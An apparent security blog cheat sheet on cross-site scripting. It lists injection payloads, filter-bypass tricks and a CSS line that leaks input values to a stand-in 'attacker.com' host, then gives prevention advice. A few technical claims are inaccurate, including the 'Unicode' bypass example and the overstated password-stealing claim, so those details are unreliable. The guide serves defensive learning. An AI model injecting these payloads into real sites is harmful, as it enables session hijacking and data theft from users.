Cross-Site Scripting (XSS) Attacks
by

Cross-Site Scripting (XSS) Cheat Sheet: A Comprehensive Guide

Introduction to XSS Attacks

Cross-Site Scripting (XSS) is a common web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. These attacks occur when an application includes untrusted data without proper validation, enabling hackers to execute scripts in a victim’s browser.

This cheat sheet covers various XSS attack techniques, including HTML tricks, CSS exploits, JavaScript injections, and event handlers. Whether you’re a developer, security researcher, or ethical hacker, understanding these vectors helps in securing web applications.

Types of XSS Attacks

There are three main types of XSS attacks:

  1. Persistent (Stored) XSS
  • Malicious script is permanently stored on the target server (e.g., in a database).
  • Example: Injecting a script in a comment field that executes for all users.
  1. Non-Persistent (Reflected) XSS
  • The attack is reflected off a web server (e.g., via a malicious URL).
  • Example: Crafting a phishing link that executes JavaScript when clicked.
  1. DOM-Based XSS
  • The vulnerability exists in client-side code rather than server-side.
  • Example: Manipulating JavaScript to alter the DOM and execute malicious code.

Common XSS Attack Vectors

1. Basic HTML Injection

<script>alert("XSS")</script>
  • Executes a simple alert box.

2. Image Tag XSS

<img src="x" onerror="alert('XSS')">
  • Triggers JavaScript when the image fails to load.

3. SVG-Based XSS

<svg onload="alert('XSS')"></svg>
  • Uses SVG’s onload event to execute JavaScript.

4. JavaScript Protocol in Links

<a href="javascript:alert('XSS')">Click Me</a>
  • Runs JavaScript when the link is clicked.

5. Iframe Injection

<iframe src="javascript:alert('XSS')"></iframe>
  • Embeds malicious JavaScript in an iframe.

Advanced XSS Techniques

1. Bypassing Filters with Unicode

<IMG SRC=javascript:alert('XSS')>
  • Some filters block javascript: but allow variations like JaVaScRiPt:.

2. Using HTML Entities

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;
  • Encodes JavaScript to evade detection.

3. Event Handlers for XSS

<body onload="alert('XSS')">
  • Triggers JavaScript when the page loads.

4. CSS-Based XSS

<style>input[value^="a"] { background: url("//attacker.com/steal?a"); }</style>
  • Steals password inputs via CSS attribute selectors.

5. DOM-Based XSS via URL Fragments

<script>eval(location.hash.slice(1))</script>
  • Executes JavaScript from the URL hash (#alert(1)).

Preventing XSS Attacks

To defend against XSS, developers should:

  1. Use Output Encoding
  • Encode data before rendering it in HTML (&lt; instead of <).
  1. Implement Content Security Policy (CSP)
  • Restricts inline scripts and external sources.
  1. Sanitize User Input
  • Use libraries like DOMPurify to clean HTML input.
  1. Enable HttpOnly Cookies
  • Prevents JavaScript from accessing session cookies.
  1. Validate and Escape Inputs
  • Apply strict input validation and escape special characters.

Conclusion

XSS attacks remain a critical threat to web security. By understanding attack vectors and implementing robust defenses, developers can protect users from malicious scripts. Always test applications for vulnerabilities using ethical hacking techniques and stay updated with security best practices.

For more security insights, follow our blog and explore penetration testing tools like Burp Suite and OWASP ZAP.

🔐 Stay Secure, Stay Safe 🔐

Leave a Comment